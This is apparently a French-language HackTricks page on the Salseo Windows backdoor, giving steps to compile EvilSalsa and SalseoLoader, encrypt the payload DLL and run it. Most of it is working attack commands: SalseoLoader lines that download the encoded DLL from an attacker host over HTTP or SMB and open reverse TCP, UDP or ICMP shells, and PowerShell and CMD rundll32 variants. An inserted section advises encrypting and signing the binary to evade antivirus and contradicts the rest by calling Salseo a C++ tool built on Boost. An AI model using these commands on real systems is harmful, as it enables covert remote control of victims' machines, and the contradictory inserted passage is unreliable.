11 KiB
Salseo
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- Travaillez-vous dans une entreprise de cybersécurité ? Voulez-vous voir votre entreprise annoncée dans HackTricks ? ou voulez-vous avoir accès à la dernière version de PEASS ou télécharger HackTricks en PDF ? Consultez les PLANS D'ABONNEMENT !
- Découvrez The PEASS Family, notre collection exclusive de NFTs
- Obtenez le swag officiel PEASS & HackTricks
- Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez moi sur Twitter 🐦@carlospolopm.
- Partagez vos astuces de piratage en soumettant des PR au repo hacktricks et au repo hacktricks-cloud.
Compiler les binaires
Téléchargez le code source depuis Github et compilez EvilSalsa et SalseoLoader. Vous aurez besoin de Visual Studio installé pour compiler le code.
Compilez ces projets pour l'architecture de la machine Windows où vous allez les utiliser (si Windows prend en charge x64, compilez-les pour cette architecture).
Vous pouvez sélectionner l'architecture dans Visual Studio dans l'onglet "Build" à gauche dans "Platform Target".
(**Si vous ne trouvez pas ces options, cliquez sur "Project Tab" puis sur "<Project Name> Properties")
Ensuite, compilez les deux projets (Build -> Build Solution) (Le chemin de l'exécutable apparaîtra dans les journaux) :
Préparer la porte dérobée
Tout d'abord, vous devrez encoder le EvilSalsa.dll. Pour ce faire, vous pouvez utiliser le script python encrypterassembly.py ou vous pouvez compiler le projet EncrypterAssembly :
Python
python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
Windows
Introduction
Les backdoors sont des outils très utiles pour les pentesters et les attaquants. Ils permettent d'accéder à un système compromis à distance et de manière discrète. Dans ce chapitre, nous allons nous concentrer sur les backdoors pour les systèmes Windows.
Salseo
Salseo est un backdoor pour les systèmes Windows qui utilise le protocole HTTP pour communiquer avec le serveur de commande et de contrôle (C&C). Il est écrit en C++ et utilise la bibliothèque Boost pour les opérations réseau.
Fonctionnalités
Salseo a les fonctionnalités suivantes :
- Téléchargement et exécution de fichiers
- Capture d'écran
- Enregistrement audio
- Enregistrement vidéo
- Envoi de fichiers
- Exécution de commandes système
- Injection de DLL
- Suppression de fichiers
- Désinstallation
Utilisation
Pour utiliser Salseo, il faut d'abord compiler le code source en utilisant Visual Studio. Ensuite, il faut configurer le serveur C&C dans le code source en modifiant l'adresse IP et le port. Enfin, il faut exécuter le backdoor sur le système cible.
Une fois que le backdoor est en cours d'exécution sur le système cible, il se connectera au serveur C&C et attendra des instructions. Les instructions peuvent être envoyées au backdoor en utilisant une interface Web ou en utilisant une connexion directe au serveur C&C.
Détection
Salseo peut être détecté par les antivirus en raison de sa signature. Pour éviter la détection, il est recommandé de crypter le binaire et de le signer avec un certificat valide. Il est également recommandé de modifier le code source pour éviter les signatures connues.
Conclusion
Salseo est un backdoor puissant pour les systèmes Windows. Il est facile à utiliser et à configurer, mais il peut être détecté par les antivirus. Il est donc recommandé de prendre des mesures pour éviter la détection.
EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt
Ok, vous avez maintenant tout ce dont vous avez besoin pour exécuter tout le processus Salseo : le fichier EvilDalsa.dll encodé et le binaire de SalseoLoader.
Téléchargez le binaire SalseoLoader.exe sur la machine. Il ne devrait pas être détecté par un quelconque antivirus...
Exécuter la porte dérobée
Obtenir un shell TCP inversé (téléchargement du fichier dll encodé via HTTP)
N'oubliez pas de démarrer un nc en tant qu'écouteur de shell inversé et un serveur HTTP pour servir le fichier evilsalsa encodé.
SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>
Obtention d'un shell inversé UDP (téléchargement d'un fichier dll encodé via SMB)
N'oubliez pas de démarrer un nc en tant qu'écouteur de shell inversé et un serveur SMB pour servir le fichier evilsalsa encodé (impacket-smbserver).
SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>
Obtenir un shell inversé ICMP (dll encodée déjà présente sur la victime)
Cette fois, vous avez besoin d'un outil spécial sur le client pour recevoir le shell inversé. Téléchargez: https://github.com/inquisb/icmpsh
Désactiver les réponses ICMP:
sysctl -w net.ipv4.icmp_echo_ignore_all=1
#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0
Exécuter le client :
python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"
À l'intérieur de la victime, exécutons la chose salseo :
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>
Compilation de SalseoLoader en tant que DLL exportant une fonction principale
Ouvrez le projet SalseoLoader à l'aide de Visual Studio.
Ajoutez avant la fonction principale: [DllExport]
Installez DllExport pour ce projet
Outils --> Gestionnaire de packages NuGet --> Gérer les packages NuGet pour la solution...
Recherchez le package DllExport (en utilisant l'onglet Parcourir), et appuyez sur Installer (et acceptez la fenêtre contextuelle)
Les fichiers suivants sont apparus dans votre dossier de projet: DllExport.bat et DllExport_Configure.bat
Désinstallez DllExport
Appuyez sur Désinstaller (oui, c'est étrange mais croyez-moi, c'est nécessaire)
Quittez Visual Studio et exécutez DllExport_configure
Simplement quittez Visual Studio
Ensuite, allez dans votre dossier SalseoLoader et exécutez DllExport_Configure.bat
Sélectionnez x64 (si vous allez l'utiliser dans une boîte x64, c'était mon cas), sélectionnez System.Runtime.InteropServices (dans Namespace pour DllExport) et appuyez sur Appliquer
Ouvrez à nouveau le projet avec Visual Studio
[DllExport] ne doit plus être marqué comme une erreur
Compilez la solution
Sélectionnez Type de sortie = Bibliothèque de classes (Projet --> Propriétés de SalseoLoader --> Application --> Type de sortie = Bibliothèque de classes)
Sélectionnez plateforme x64 (Projet --> Propriétés de SalseoLoader --> Générer --> Plateforme cible = x64)
Pour compiler la solution: Build --> Build Solution (Le chemin de la nouvelle DLL apparaîtra dans la console de sortie)
Testez la DLL générée
Copiez et collez la DLL où vous voulez la tester.
Exécutez:
rundll32.exe SalseoLoader.dll,main
Si aucune erreur n'apparaît, vous avez probablement une DLL fonctionnelle !!
Obtenir un shell en utilisant la DLL
N'oubliez pas d'utiliser un serveur HTTP et de définir un écouteur nc
Powershell
$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main
CMD
CMD (Command Prompt) est un outil intégré dans Windows qui permet aux utilisateurs d'interagir avec le système d'exploitation en utilisant des commandes textuelles. Les hackers peuvent utiliser CMD pour exécuter des commandes malveillantes, telles que la création de backdoors ou la suppression de fichiers importants. Il est important de surveiller l'utilisation de CMD sur les systèmes pour détecter toute activité suspecte.
set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- Travaillez-vous dans une entreprise de cybersécurité ? Voulez-vous voir votre entreprise annoncée dans HackTricks ? ou voulez-vous avoir accès à la dernière version de PEASS ou télécharger HackTricks en PDF ? Consultez les PLANS D'ABONNEMENT !
- Découvrez The PEASS Family, notre collection exclusive de NFTs
- Obtenez le swag officiel PEASS & HackTricks
- Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez moi sur Twitter 🐦@carlospolopm.
- Partagez vos astuces de piratage en soumettant des PR au repo hacktricks et au repo hacktricks-cloud.